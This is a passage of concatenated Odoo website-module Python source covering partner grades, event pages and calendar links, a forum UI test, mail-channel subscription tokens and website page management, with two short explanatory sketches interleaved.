grade.website_url = "/partners/grade/%s" % (slug(grade))
class ResPartnerActivation(models.Model):
_name = 'res.partner.activation'
_order = 'sequence'
_description = 'Partner Activation'
sequence = fields.Integer('Sequence')
name = fields.Char('Name', required=True)
class ResPartner(models.Model):
_inherit = "res.partner"
partner_weight = fields.Integer('Level Weight', default=0, track_visibility='onchange',
help="This should be a numerical value greater than 0 which will decide the contention for this partner to take this lead/opportunity.")
grade_id = fields.Many2one('res.partner.grade', 'Level', track_visibility='onchange')
grade_sequence = fields.Integer(related='grade_id.sequence', readonly=True, store=True)
activation = fields.Many2one('res.partner.activation', 'Activation', index=True, track_visibility='onchange')
date_partnership = fields.Date('Partnership Date')
date_review = fields.Date('Latest Partner Review')
date_review_next = fields.Date('Next Partner Review')
# customer implementation
assigned_partner_id = fields.Many2one(
'res.partner', 'Implemented by',
)
implemented_partner_ids = fields.One2many(
'res.partner', 'assigned_partner_id',
string='Implementation References',
)
implemented_count = fields.Integer(compute='_compute_implemented_partner_count', store=True)
@api.one
@api.depends('implemented_partner_ids', 'implemented_partner_ids.website_published', 'implemented_partner_ids.active')
def _compute_implemented_partner_count(self):
self.implemented_count = len(self.implemented_partner_ids.filtered('website_published'))
@api.onchange('grade_id')
def _onchange_grade_id(self):
grade = self.grade_id
self.partner_weight = grade.partner_weight if grade else 0
```
#### File: website_event/models/event.py
```python
import logging
import pytz
import werkzeug
from odoo import api, fields, models, _
from odoo.addons.http_routing.models.ir_http import slug
from odoo.exceptions import UserError
_logger = logging.getLogger(__name__)
try:
import vobject
except ImportError:
_logger.warning("`vobject` Python module not found, iCal file generation disabled. Consider installing this module if you want to generate iCal files")
vobject = None
GOOGLE_CALENDAR_URL = 'https://www.google.com/calendar/render?'
class EventType(models.Model):
_name = 'event.type'
_inherit = ['event.type']
website_menu = fields.Boolean(
'Display a dedicated menu on Website')
class Event(models.Model):
_name = 'event.event'
_inherit = ['event.event', 'website.seo.metadata', 'website.published.multi.mixin']
is_published = fields.Boolean(track_visibility='onchange')
is_participating = fields.Boolean("Is Participating", compute="_compute_is_participating")
website_menu = fields.Boolean('Dedicated Menu',
help="Creates menus Introduction, Location and Register on the page "
" of the event on the website.", copy=False)
menu_id = fields.Many2one('website.menu', 'Event Menu', copy=False)
def _compute_is_participating(self):
# we don't allow public user to see participating label
if self.env.user != self.env['website'].get_current_website().user_id:
email = self.env.user.partner_id.email
for event in self:
domain = ['&', '|', ('email', '=', email), ('partner_id', '=', self.env.user.partner_id.id), ('event_id', '=', event.id)]
event.is_participating = self.env['event.registration'].search_count(domain)
@api.multi
@api.depends('name')
def _compute_website_url(self):
super(Event, self)._compute_website_url()
for event in self:
            if event.id:  # avoid performing a slug on a not-yet-saved record, e.g. during an onchange.
event.website_url = '/event/%s' % slug(event)
@api.onchange('event_type_id')
def _onchange_type(self):
super(Event, self)._onchange_type()
if self.event_type_id:
self.website_menu = self.event_type_id.website_menu
def _get_menu_entries(self):
""" Method returning menu entries to display on the website view of the
event, possibly depending on some options in inheriting modules. """
self.ensure_one()
return [
(_('Introduction'), False, 'website_event.template_intro'),
(_('Location'), False, 'website_event.template_location'),
(_('Register'), '/event/%s/register' % slug(self), False),
]
def _toggle_create_website_menus(self, vals):
for event in self:
if 'website_menu' in vals:
if event.menu_id and not event.website_menu:
event.menu_id.unlink()
elif event.website_menu:
if not event.menu_id:
root_menu = self.env['website.menu'].create({'name': event.name, 'website_id': event.website_id.id})
event.menu_id = root_menu
for sequence, (name, url, xml_id) in enumerate(event._get_menu_entries()):
event._create_menu(sequence, name, url, xml_id)
@api.model
def create(self, vals):
res = super(Event, self).create(vals)
res._toggle_create_website_menus(vals)
return res
@api.multi
def write(self, vals):
res = super(Event, self).write(vals)
self._toggle_create_website_menus(vals)
return res
def _create_menu(self, sequence, name, url, xml_id):
if not url:
newpath = self.env['website'].new_page(name + ' ' + self.name, template=xml_id, ispage=False)['url']
url = "/event/" + slug(self) + "/page/" + newpath[1:]
menu = self.env['website.menu'].create({
'name': name,
'url': url,
'parent_id': self.menu_id.id,
'sequence': sequence,
'website_id': self.website_id.id,
})
return menu
@api.multi
def google_map_img(self, zoom=8, width=298, height=298):
self.ensure_one()
if self.address_id:
return self.sudo().address_id.google_map_img(zoom=zoom, width=width, height=height)
return None
@api.multi
def google_map_link(self, zoom=8):
self.ensure_one()
if self.address_id:
return self.sudo().address_id.google_map_link(zoom=zoom)
return None
@api.multi
def _track_subtype(self, init_values):
self.ensure_one()
if 'is_published' in init_values and self.is_published:
return 'website_event.mt_event_published'
elif 'is_published' in init_values and not self.is_published:
return 'website_event.mt_event_unpublished'
return super(Event, self)._track_subtype(init_values)
@api.multi
def action_open_badge_editor(self):
""" open the event badge editor : redirect to the report page of event badge report """
self.ensure_one()
return {
'type': 'ir.actions.act_url',
'target': 'new',
'url': '/report/html/%s/%s?enable_editor' % ('event.event_event_report_template_badge', self.id),
}
@api.multi
def _get_ics_file(self):
""" Returns iCalendar file for the event invitation.
:returns a dict of .ics file content for each event
"""
result = {}
if not vobject:
return result
for event in self:
cal = vobject.iCalendar()
cal_event = cal.add('vevent')
if not event.date_begin or not event.date_end:
raise UserError(_("No date has been specified for the event, no file will be generated."))
cal_event.add('created').value = fields.Datetime.now().replace(tzinfo=pytz.timezone('UTC'))
cal_event.add('dtstart').value = fields.Datetime.from_string(event.date_begin).replace(tzinfo=pytz.timezone('UTC'))
cal_event.add('dtend').value = fields.Datetime.from_string(event.date_end).replace(tzinfo=pytz.timezone('UTC'))
cal_event.add('summary').value = event.name
if event.address_id:
cal_event.add('location').value = event.sudo().address_id.contact_address
result[event.id] = cal.serialize().encode('utf-8')
return result
def _get_event_resource_urls(self, attendees):
url_date_start = self.date_begin.strftime('%Y%m%dT%H%M%SZ')
url_date_stop = self.date_end.strftime('%Y%m%dT%H%M%SZ')
params = {
'action': 'TEMPLATE',
'text': self.name,
'dates': url_date_start + '/' + url_date_stop,
'details': self.name,
}
if self.address_id:
params.update(location=self.sudo().address_id.contact_address.replace('\n', ' '))
encoded_params = werkzeug.url_encode(params)
google_url = GOOGLE_CALENDAR_URL + encoded_params
iCal_url = '/event/%s/ics?%s' % (slug(self), encoded_params)
return {'google_url': google_url, 'iCal_url': iCal_url}
def _default_website_meta(self):
res = super(Event, self)._default_website_meta()
res['default_opengraph']['og:title'] = res['default_twitter']['twitter:title'] = self.name
res['default_opengraph']['og:description'] = res['default_twitter']['twitter:description'] = self.date_begin
res['default_twitter']['twitter:card'] = 'summary'
return res
```
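The Google Calendar link produced by `_get_event_resource_urls` above is a plain query string appended to GOOGLE_CALENDAR_URL. Below is a standalone sketch of the same construction using the standard library instead of werkzeug; the event name, dates and location are placeholder values, not data from the module.
```python
# Hedged sketch of the calendar URL built by _get_event_resource_urls; all values are placeholders.
from datetime import datetime
from urllib.parse import urlencode

GOOGLE_CALENDAR_URL = 'https://www.google.com/calendar/render?'

date_begin = datetime(2024, 5, 1, 9, 0)   # hypothetical event start (UTC)
date_end = datetime(2024, 5, 1, 17, 0)    # hypothetical event end (UTC)

params = {
    'action': 'TEMPLATE',
    'text': 'Odoo Experience',             # event name
    'dates': '%s/%s' % (date_begin.strftime('%Y%m%dT%H%M%SZ'),
                        date_end.strftime('%Y%m%dT%H%M%SZ')),
    'details': 'Odoo Experience',
    'location': 'Louvain-la-Neuve, Belgium',
}
print(GOOGLE_CALENDAR_URL + urlencode(params))
```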
#### File: website_forum/tests/test_forum_process.py
```python
import odoo.tests
@odoo.tests.common.tagged('post_install', '-at_install')
class TestUi(odoo.tests.HttpCase):
def test_01_admin_forum_tour(self):
self.phantom_js("/", "odoo.__DEBUG__.services['web_tour.tour'].run('question')", "odoo.__DEBUG__.services['web_tour.tour'].tours.question.ready", login="admin")
def test_02_demo_question(self):
forum = self.env.ref('website_forum.forum_help')
demo = self.env.ref('base.user_demo')
demo.karma = forum.karma_post + 1
self.phantom_js("/", "odoo.__DEBUG__.services['web_tour.tour'].run('forum_question')", "odoo.__DEBUG__.services['web_tour.tour'].tours.forum_question.ready", login="demo")
```
#### File: website_mail_channel/models/mail_channel.py
```python
import hmac
from werkzeug import urls
from odoo import api, models
from odoo.tools.safe_eval import safe_eval
from odoo.addons.http_routing.models.ir_http import slug
class MailGroup(models.Model):
_inherit = 'mail.channel'
@api.multi
def _notify_specific_email_values(self, message):
res = super(MailGroup, self)._notify_specific_email_values(message)
try:
headers = safe_eval(res.get('headers', dict()))
except Exception:
headers = {}
base_url = self.env['ir.config_parameter'].sudo().get_param('web.base.url')
        headers['List-Archive'] = '<%s/groups/%s>' % (base_url, slug(self))
        headers['List-Subscribe'] = '<%s/groups>' % base_url
        headers['List-Unsubscribe'] = '<%s/groups?unsubscribe>' % base_url
res['headers'] = repr(headers)
return res
@api.multi
def _send_confirmation_email(self, partner_ids, unsubscribe=False):
base_url = self.env['ir.config_parameter'].sudo().get_param('web.base.url')
route = "/groups/%(action)s/%(channel)s/%(partner)s/%(token)s"
if unsubscribe:
template = self.env.ref('website_mail_channel.mail_template_list_unsubscribe')
action = 'unsubscribe'
else:
template = self.env.ref('website_mail_channel.mail_template_list_subscribe')
action = 'subscribe'
for partner_id in partner_ids:
# generate a new token per subscriber
token = self._generate_action_token(partner_id, action=action)
token_url = urls.url_join(base_url, route % {
'action': action,
'channel': self.id,
'partner': partner_id,
'token': token,
})
template.with_context(token_url=token_url).send_mail(self.id,
force_send=True,
email_values={'recipient_ids': [(4, partner_id)]}
)
return True
@api.multi
def _generate_action_token(self, partner_id, action='unsubscribe'):
self.ensure_one()
secret = self.env['ir.config_parameter'].sudo().get_param('database.secret')
data = '$'.join([
str(self.id),
str(partner_id),
action])
return hmac.new(secret.encode('utf-8'), data.encode('utf-8')).hexdigest()
```
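`_generate_action_token` above signs "channel$partner$action" with the `database.secret` parameter. The following self-contained sketch computes and verifies such a token; the secret and ids are placeholders, and the explicit `hashlib.md5` digest merely reproduces the historical default that the original `hmac.new(...)` call (which passes no digestmod, and therefore raises on Python 3.8+) relied on.
```python
# Hedged sketch of the subscribe/unsubscribe token scheme used above; values are placeholders.
import hashlib
import hmac

def generate_action_token(secret, channel_id, partner_id, action='unsubscribe'):
    data = '$'.join([str(channel_id), str(partner_id), action])
    # digestmod is explicit here; the controller code relies on the old MD5 default
    return hmac.new(secret.encode('utf-8'), data.encode('utf-8'), hashlib.md5).hexdigest()

def check_action_token(secret, channel_id, partner_id, action, token):
    expected = generate_action_token(secret, channel_id, partner_id, action)
    # constant-time comparison avoids leaking information through timing
    return hmac.compare_digest(expected, token)

secret = 'database-secret-placeholder'   # stands in for ir.config_parameter 'database.secret'
token = generate_action_token(secret, 42, 7, 'subscribe')
assert check_action_token(secret, 42, 7, 'subscribe', token)
```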
#### File: website/models/website.py
```python
import inspect
import logging
import hashlib
import re
from werkzeug import urls
from werkzeug.exceptions import NotFound
from odoo import api, fields, models, tools
from odoo.addons.http_routing.models.ir_http import slugify, _guess_mimetype
from odoo.addons.website.models.ir_http import sitemap_qs2dom
from odoo.addons.portal.controllers.portal import pager
from odoo.tools import pycompat
from odoo.http import request
from odoo.osv import expression
from odoo.osv.expression import FALSE_DOMAIN
from odoo.tools.translate import _
logger = logging.getLogger(__name__)
DEFAULT_CDN_FILTERS = [
"^/[^/]+/static/",
"^/web/(css|js)/",
"^/web/image",
"^/web/content",
# retrocompatibility
"^/website/image/",
]
class Website(models.Model):
_name = "website"
_description = "Website"
@api.model
def website_domain(self, website_id=False):
return [('website_id', 'in', (False, website_id or self.id))]
def _active_languages(self):
return self.env['res.lang'].search([]).ids
def _default_language(self):
lang_code = self.env['ir.default'].get('res.partner', 'lang')
def_lang = self.env['res.lang'].search([('code', '=', lang_code)], limit=1)
return def_lang.id if def_lang else self._active_languages()[0]
name = fields.Char('Website Name', required=True)
domain = fields.Char('Website Domain')
country_group_ids = fields.Many2many('res.country.group', 'website_country_group_rel', 'website_id', 'country_group_id',
string='Country Groups', help='Used when multiple websites have the same domain.')
company_id = fields.Many2one('res.company', string="Company", default=lambda self: self.env.ref('base.main_company').id, required=True)
language_ids = fields.Many2many('res.lang', 'website_lang_rel', 'website_id', 'lang_id', 'Languages', default=_active_languages)
default_lang_id = fields.Many2one('res.lang', string="Default Language", default=_default_language, required=True)
default_lang_code = fields.Char("Default language code", related='default_lang_id.code', store=True, readonly=False)
auto_redirect_lang = fields.Boolean('Autoredirect Language', default=True, help="Should users be redirected to their browser's language")
def _default_social_facebook(self):
return self.env.ref('base.main_company').social_facebook
def _default_social_github(self):
return self.env.ref('base.main_company').social_github
def _default_social_linkedin(self):
return self.env.ref('base.main_company').social_linkedin
def _default_social_youtube(self):
return self.env.ref('base.main_company').social_youtube
def _default_social_googleplus(self):
return self.env.ref('base.main_company').social_googleplus
def _default_social_instagram(self):
return self.env.ref('base.main_company').social_instagram
def _default_social_twitter(self):
return self.env.ref('base.main_company').social_twitter
social_twitter = fields.Char('Twitter Account', default=_default_social_twitter)
social_facebook = fields.Char('Facebook Account', default=_default_social_facebook)
social_github = fields.Char('GitHub Account', default=_default_social_github)
social_linkedin = fields.Char('LinkedIn Account', default=_default_social_linkedin)
social_youtube = fields.Char('Youtube Account', default=_default_social_youtube)
social_googleplus = fields.Char('Google+ Account', default=_default_social_googleplus)
social_instagram = fields.Char('Instagram Account', default=_default_social_instagram)
social_default_image = fields.Binary(string="Default Social Share Image", attachment=True, help="If set, replaces the company logo as the default social share image.")
google_analytics_key = fields.Char('Google Analytics Key')
google_management_client_id = fields.Char('Google Client ID')
google_management_client_secret = fields.Char('Google Client Secret')
google_maps_api_key = fields.Char('Google Maps API Key')
user_id = fields.Many2one('res.users', string='Public User', required=True)
cdn_activated = fields.Boolean('Content Delivery Network (CDN)')
cdn_url = fields.Char('CDN Base URL', default='')
cdn_filters = fields.Text('CDN Filters', default=lambda s: '\n'.join(DEFAULT_CDN_FILTERS), help="URL matching those filters will be rewritten using the CDN Base URL")
partner_id = fields.Many2one(related='user_id.partner_id', relation='res.partner', string='Public Partner', readonly=False)
menu_id = fields.Many2one('website.menu', compute='_compute_menu', string='Main Menu')
homepage_id = fields.Many2one('website.page', string='Homepage')
favicon = fields.Binary(string="Website Favicon", help="This field holds the image used to display a favicon on the website.")
theme_id = fields.Many2one('ir.module.module', help='Installed theme')
specific_user_account = fields.Boolean('Specific User Account', help='If True, new accounts will be associated to the current website')
auth_signup_uninvited = fields.Selection([
('b2b', 'On invitation'),
('b2c', 'Free sign up'),
], string='Customer Account', default='b2b')
@api.onchange('language_ids')
def _onchange_language_ids(self):
if self.language_ids and self.default_lang_id not in self.language_ids:
self.default_lang_id = self.language_ids[0]
@api.multi
def _compute_menu(self):
Menu = self.env['website.menu']
for website in self:
website.menu_id = Menu.search([('parent_id', '=', False), ('website_id', '=', website.id)], order='id', limit=1).id
@api.model
def create(self, vals):
if 'user_id' not in vals:
company = self.env['res.company'].browse(vals.get('company_id'))
vals['user_id'] = company._get_public_user().id if company else self.env.ref('base.public_user').id
res = super(Website, self).create(vals)
res._bootstrap_homepage()
if not self.env.user.has_group('website.group_multi_website') and self.search_count([]) > 1:
all_user_groups = 'base.group_portal,base.group_user,base.group_public'
groups = self.env['res.groups'].concat(*(self.env.ref(it) for it in all_user_groups.split(',')))
groups.write({'implied_ids': [(4, self.env.ref('website.group_multi_website').id)]})
return res
@api.multi
def write(self, values):
public_user_to_change_websites = self.env['website']
self._get_languages.clear_cache(self)
if 'company_id' in values and 'user_id' not in values:
public_user_to_change_websites = self.filtered(lambda w: w.sudo().user_id.company_id.id != values['company_id'])
if public_user_to_change_websites:
company = self.env['res.company'].browse(values['company_id'])
super(Website, public_user_to_change_websites).write(dict(values, user_id=company._get_public_user().id))
result = super(Website, self - public_user_to_change_websites).write(values)
if 'cdn_activated' in values or 'cdn_url' in values or 'cdn_filters' in values:
# invalidate the caches from static node at compile time
self.env['ir.qweb'].clear_caches()
return result
@api.multi
def unlink(self):
# Do not delete invoices, delete what's strictly necessary
attachments_to_unlink = self.env['ir.attachment'].search([
('website_id', 'in', self.ids),
'|', '|',
('key', '!=', False), # theme attachment
('url', 'ilike', '.custom.'), # customized theme attachment
('url', 'ilike', '.assets\\_'),
])
attachments_to_unlink.unlink()
return super(Website, self).unlink()
# ----------------------------------------------------------
# Page Management
# ----------------------------------------------------------
def _bootstrap_homepage(self):
standard_homepage = self.env.ref('website.homepage', raise_if_not_found=False)
if not standard_homepage:
return
new_homepage_view = '''<t name="Homepage" t-name="website.homepage%s">
<t t-call="website.layout">
<t t-set="pageName" t-value="'homepage'"/>
<div id="wrap" class="oe_structure oe_empty"/>
</t>
</t>''' % (self.id)
standard_homepage.with_context(website_id=self.id).arch_db = new_homepage_view
self.homepage_id = self.env['website.page'].search([('website_id', '=', self.id),
('key', '=', standard_homepage.key)])
# prevent /-1 as homepage URL
self.homepage_id.url = '/'
# Bootstrap default menu hierarchy, create a new minimalist one if no default
default_menu = self.env.ref('website.main_menu')
self.copy_menu_hierarchy(default_menu)
def copy_menu_hierarchy(self, top_menu):
def copy_menu(menu, t_menu):
new_menu = menu.copy({
'parent_id': t_menu.id,
'website_id': self.id,
})
for submenu in menu.child_id:
copy_menu(submenu, new_menu)
for website in self:
new_top_menu = top_menu.copy({
'name': _('Top Menu for Website %s') % website.id,
'website_id': website.id,
})
for submenu in top_menu.child_id:
copy_menu(submenu, new_top_menu)
@api.model
def new_page(self, name=False, add_menu=False, template='website.default_page', ispage=True, namespace=None):
""" Create a new website page, and assign it a xmlid based on the given one
:param name : the name of the page
:param template : potential xml_id of the page to create
:param namespace : module part of the xml_id if none, the template module name is used
"""
if namespace:
template_module = namespace
else:
template_module, _ = template.split('.')
page_url = '/' + slugify(name, max_length=1024, path=True)
page_url = self.get_unique_path(page_url)
page_key = slugify(name)
result = dict({'url': page_url, 'view_id': False})
if not name:
name = 'Home'
page_key = 'home'
template_record = self.env.ref(template)
website_id = self._context.get('website_id')
key = self.get_unique_key(page_key, template_module)
view = template_record.copy({'website_id': website_id, 'key': key})
view.with_context(lang=None).write({
'arch': template_record.arch.replace(template, key),
'name': name,
})
if view.arch_fs:
view.arch_fs = False
website = self.get_current_website()
if ispage:
page = self.env['website.page'].create({
'url': page_url,
                'website_id': website.id,  # remove it if only one website or not?
'view_id': view.id,
})
result['view_id'] = view.id
if add_menu:
self.env['website.menu'].create({
'name': name,
'url': page_url,
'parent_id': website.menu_id.id,
'page_id': page.id,
'website_id': website.id,
})
return result
@api.model
def guess_mimetype(self):
return _guess_mimetype()
def get_unique_path(self, page_url):
""" Given an url, return that url suffixed by counter if it already exists
:param page_url : the url to be checked for uniqueness
"""
inc = 0
# we only want a unique_path for website specific.
# we need to be able to have /url for website=False, and /url for website=1
# in case of duplicate, page manager will allow you to manage this case
domain_static = [('website_id', '=', self.get_current_website().id)] # .website_domain()
page_temp = page_url
while self.env['website.page'].with_context(active_test=False).sudo().search([('url', '=', page_temp)] + domain_static):
inc += 1
page_temp = page_url + (inc and "-%s" % inc or "")
return page_temp
def get_unique_key(self, string, template_module=False):
""" Given a string, return an unique key including module prefix.
It will be suffixed by a counter if it already exists to garantee uniqueness.
:param string : the key to be checked for uniqueness, you can pass it with 'website.' or not
:param template_module : the module to be prefixed on the key, if not set, we will use website
"""
if template_module:
string = template_module + '.' + string
else:
if not string.startswith('website.'):
string = 'website.' + string
# Look for unique key
key_copy = string
inc = 0
domain_static = self.get_current_website().website_domain()
while self.env['website.page'].with_context(active_test=False).sudo().search([('key', '=', key_copy)] + domain_static):
inc += 1
key_copy = string + (inc and "-%s" % inc or "")
return key_copy
@api.model
def page_search_dependencies(self, page_id=False):
""" Search dependencies just for information. It will not catch 100%
of dependencies and False positive is more than possible
Each module could add dependences in this dict
:returns a dictionnary where key is the 'categorie' of object related to the given
view, and the value is the list of text and link to the resource using given page
"""
dependencies = {}
if not page_id:
return dependencies
page = self.env['website.page'].browse(int(page_id))
website = self.env['website'].browse(self._context.get('website_id'))
url = page.url
# search for website_page with link
website_page_search_dom = [('view_id.arch_db', 'ilike', url)] + website.website_domain()
pages = self.env['website.page'].search(website_page_search_dom)
page_key = _('Page')
if len(pages) > 1:
page_key = _('Pages')
page_view_ids = []
for page in pages:
dependencies.setdefault(page_key, [])
dependencies[page_key].append({
'text': _('Page <b>%s</b> contains a link to this page') % page.url,
'item': page.name,
'link': page.url,
})
page_view_ids.append(page.view_id.id)
# search for ir_ui_view (not from a website_page) with link
page_search_dom = [('arch_db', 'ilike', url), ('id', 'not in', page_view_ids)] + website.website_domain()
views = self.env['ir.ui.view'].search(page_search_dom)
view_key = _('Template')
if len(views) > 1:
view_key = _('Templates')
for view in views:
dependencies.setdefault(view_key, [])
dependencies[view_key].append({
'text': _('Template <b>%s (id:%s)</b> contains a link to this page') % (view.key or view.name, view.id),
'link': '/web#id=%s&view_type=form&model=ir.ui.view' % view.id,
'item': _('%s (id:%s)') % (view.key or view.name, view.id),
})
# search for menu with link
menu_search_dom = [('url', 'ilike', '%s' % url)] + website.website_domain()
menus = self.env['website.menu'].search(menu_search_dom)
menu_key = _('Menu')
if len(menus) > 1:
menu_key = _('Menus')
for menu in menus:
dependencies.setdefault(menu_key, []).append({
'text': _('This page is in the menu <b>%s</b>') % menu.name,
'link': '/web#id=%s&view_type=form&model=website.menu' % menu.id,
'item': menu.name,
})
return dependencies
@api.model
def page_search_key_dependencies(self, page_id=False):
""" Search dependencies just for information. It will not catch 100%
of dependencies and False positive is more than possible
Each module could add dependences in this dict
:returns a dictionnary where key is the 'categorie' of object related to the given
view, and the value is the list of text and link to the resource using given page
"""
dependencies = {}
if not page_id:
return dependencies
page = self.env['website.page'].browse(int(page_id))
website = self.env['website'].browse(self._context.get('website_id'))
key = page.key
# search for website_page with link
website_page_search_dom = [
('view_id.arch_db', 'ilike', key),
('id', '!=', page.id)
] + website.website_domain()
pages = self.env['website.page'].search(website_page_search_dom)
page_key = _('Page')
if len(pages) > 1:
page_key = _('Pages')
page_view_ids = []
for p in pages:
dependencies.setdefault(page_key, [])
dependencies[page_key].append({
'text': _('Page <b>%s</b> is calling this file') % p.url,
'item': p.name,
'link': p.url,
})
page_view_ids.append(p.view_id.id)
# search for ir_ui_view (not from a website_page) with link
page_search_dom = [
('arch_db', 'ilike', key), ('id', 'not in', page_view_ids),
('id', '!=', page.view_id.id),
] + website.website_domain()
views = self.env['ir.ui.view'].search(page_search_dom)
view_key = _('Template')
if len(views) > 1:
view_key = _('Templates')
for view in views:
dependencies.setdefault(view_key, [])
dependencies[view_key].append({
'text': _('Template <b>%s (id:%s)</b> is calling this file') % (view.key or view.name, view.id),
'item': _('%s (id:%s)') % (view.key or view.name, view.id),
'link': '/web#id=%s&view_type=form&model=ir.ui.view' % view.id,
})
return dependencies
# ----------------------------------------------------------
# Languages
# ----------------------------------------------------------
@api.multi
def get_languages(self):
self.ensure_one()
return self._get_languages()
@tools.cache('self.id')
def _get_languages(self):
return [(lg.code, lg.name) for lg in self.language_ids]
@api.multi
def get_alternate_languages(self, req=None):
langs = []
if req is None:
req = request.httprequest
default = self.get_current_website().default_lang_code
shorts = []
def get_url_localized(router, lang):
arguments = dict(request.endpoint_arguments)
for key, val in list(arguments.items()):
if isinstance(val, models.BaseModel):
arguments[key] = val.with_context(lang=lang)
return router.build(request.endpoint, arguments)
router = request.httprequest.app.get_db_router(request.db).bind('')
for code, dummy in self.get_languages():
lg_path = ('/' + code) if code != default else ''
lg_codes = code.split('_')
shorts.append(lg_codes[0])
uri = get_url_localized(router, code) if request.endpoint else request.httprequest.path
if req.query_string:
uri += u'?' + req.query_string.decode('utf-8')
lang = {
'hreflang': ('-'.join(lg_codes)).lower(),
'short': lg_codes[0],
'href': req.url_root[0:-1] + lg_path + uri,
}
langs.append(lang)
for lang in langs:
if shorts.count(lang['short']) == 1:
lang['hreflang'] = lang['short']
return langs
# ----------------------------------------------------------
# Utilities
# ----------------------------------------------------------
@api.model
def get_current_website(self, fallback=True):
if request and request.session.get('force_website_id'):
return self.browse(request.session['force_website_id'])
website_id = self.env.context.get('website_id')
if website_id:
return self.browse(website_id)
# The format of `httprequest.host` is `domain:port`
domain_name = request and request.httprequest.host or ''
country = request.session.geoip.get('country_code') if request and request.session.geoip else False
country_id = False
if country:
country_id = self.env['res.country'].search([('code', '=', country)], limit=1).id
website_id = self._get_current_website_id(domain_name, country_id, fallback=fallback)
return self.browse(website_id)
@tools.cache('domain_name', 'country_id', 'fallback')
@api.model
def _get_current_website_id(self, domain_name, country_id, fallback=True):
"""Get the current website id.
First find all the websites for which the configured `domain` (after
ignoring a potential scheme) is equal to the given
`domain_name`. If there is only one result, return it immediately.
If there are no website found for the given `domain_name`, either
fallback to the first found website (no matter its `domain`) or return
False depending on the `fallback` parameter.
If there are multiple websites for the same `domain_name`, we need to
filter them out by country. We return the first found website matching
the given `country_id`. If no found website matching `domain_name`
corresponds to the given `country_id`, the first found website for
`domain_name` will be returned (no matter its country).
:param domain_name: the domain for which we want the website.
In regard to the `url_parse` method, only the `netloc` part should
be given here, no `scheme`.
:type domain_name: string
:param country_id: id of the country for which we want the website
:type country_id: int
:param fallback: if True and no website is found for the specified
`domain_name`, return the first website (without filtering them)
:type fallback: bool
:return: id of the found website, or False if no website is found and
`fallback` is False
:rtype: int or False
:raises: if `fallback` is True but no website at all is found
"""
def _remove_port(domain_name):
return (domain_name or '').split(':')[0]
def _filter_domain(website, domain_name, ignore_port=False):
"""Ignore `scheme` from the `domain`, just match the `netloc` which
is host:port in the version of `url_parse` we use."""
# Here we add http:// to the domain if it's not set because
# `url_parse` expects it to be set to correctly return the `netloc`.
website_domain = urls.url_parse(website._get_http_domain()).netloc
if ignore_port:
website_domain = _remove_port(website_domain)
domain_name = _remove_port(domain_name)
return website_domain.lower() == (domain_name or '').lower()
# Sort on country_group_ids so that we fall back on a generic website:
# websites with empty country_group_ids will be first.
found_websites = self.search([('domain', 'ilike', _remove_port(domain_name))]).sorted('country_group_ids')
# Filter for the exact domain (to filter out potential subdomains) due
# to the use of ilike.
websites = found_websites.filtered(lambda w: _filter_domain(w, domain_name))
# If there is no domain matching for the given port, ignore the port.
websites = websites or found_websites.filtered(lambda w: _filter_domain(w, domain_name, ignore_port=True))
if not websites:
if not fallback:
return False
return self.search([], limit=1).id
elif len(websites) == 1:
return websites.id
else: # > 1 website with the same domain
country_specific_websites = websites.filtered(lambda website: country_id in website.country_group_ids.mapped('country_ids').ids)
return country_specific_websites[0].id if country_specific_websites else websites[0].id
def _force(self):
self._force_website(self.id)
def _force_website(self, website_id):
if request:
request.session['force_website_id'] = website_id and str(website_id).isdigit() and int(website_id)
@api.model
def is_publisher(self):
return self.env['ir.model.access'].check('ir.ui.view', 'write', False)
@api.model
def is_user(self):
return self.env['ir.model.access'].check('ir.ui.menu', 'read', False)
@api.model
def is_public_user(self):
return request.env.user.id == request.website.user_id.id
@api.model
def viewref(self, view_id, raise_if_not_found=True):
''' Given an xml_id or a view_id, return the corresponding view record.
In case of website context, return the most specific one.
If no website_id is in the context, it will return the generic view,
instead of a random one like `get_view_id`.
Look also for archived views, no matter the context.
:param view_id: either a string xml_id or an integer view_id
:param raise_if_not_found: should the method raise an error if no view found
:return: The view record or empty recordset
'''
View = self.env['ir.ui.view']
view = View
if isinstance(view_id, pycompat.string_types):
if 'website_id' in self._context:
domain = [('key', '=', view_id)] + self.env['website'].website_domain(self._context.get('website_id'))
order = 'website_id'
else:
domain = [('key', '=', view_id)]
order = View._order
views = View.with_context(active_test=False).search(domain, order=order)
if views:
view = views.filter_duplicate()
else:
# we handle the raise below
view = self.env.ref(view_id, raise_if_not_found=False)
# self.env.ref might return something else than an ir.ui.view (eg: a theme.ir.ui.view)
if not view or view._name != 'ir.ui.view':
# make sure we always return a recordset
view = View
elif isinstance(view_id, pycompat.integer_types):
view = View.browse(view_id)
else:
raise ValueError('Expecting a string or an integer, not a %s.' % (type(view_id)))
if not view and raise_if_not_found:
raise ValueError('No record found for unique ID %s. It may have been deleted.' % (view_id))
return view
@api.model
def get_template(self, template):
View = self.env['ir.ui.view']
if isinstance(template, pycompat.integer_types):
view_id = template
else:
if '.' not in template:
template = 'website.%s' % template
view_id = View.get_view_id(template)
if not view_id:
raise NotFound
return View.browse(view_id)
@api.model
def pager(self, url, total, page=1, step=30, scope=5, url_args=None):
return pager(url, total, page=page, step=step, scope=scope, url_args=url_args)
def rule_is_enumerable(self, rule):
""" Checks that it is possible to generate sensible GET queries for
a given rule (if the endpoint matches its own requirements)
:type rule: werkzeug.routing.Rule
:rtype: bool
"""
endpoint = rule.endpoint
methods = endpoint.routing.get('methods') or ['GET']
converters = list(rule._converters.values())
if not ('GET' in methods and
endpoint.routing['type'] == 'http' and
endpoint.routing['auth'] in ('none', 'public') and
endpoint.routing.get('website', False) and
all(hasattr(converter, 'generate') for converter in converters)):
return False
# don't list routes whose arguments have no default value or converter
spec = inspect.getargspec(endpoint.method.original_func)
# remove self and arguments having a default value
defaults_count = len(spec.defaults or [])
args = spec.args[1:(-defaults_count or None)]
# check that all args have a converter
return all((arg in rule._converters) for arg in args)
@api.multi
def enumerate_pages(self, query_string=None, force=False):
""" Available pages in the website/CMS. This is mostly used for links
generation and can be overridden by modules setting up new HTML
controllers for dynamic pages (e.g. blog).
By default, returns template views marked as pages.
:param str query_string: a (user-provided) string, fetches pages
matching the string
:returns: a list of mappings with two keys: ``name`` is the displayable
name of the resource (page), ``url`` is the absolute URL
of the same.
:rtype: list({name: str, url: str})
"""
router = request.httprequest.app.get_db_router(request.db)
# Force enumeration to be performed as public user
url_set = set()
sitemap_endpoint_done = set()
for rule in router.iter_rules():
if 'sitemap' in rule.endpoint.routing:
if rule.endpoint in sitemap_endpoint_done:
continue
sitemap_endpoint_done.add(rule.endpoint)
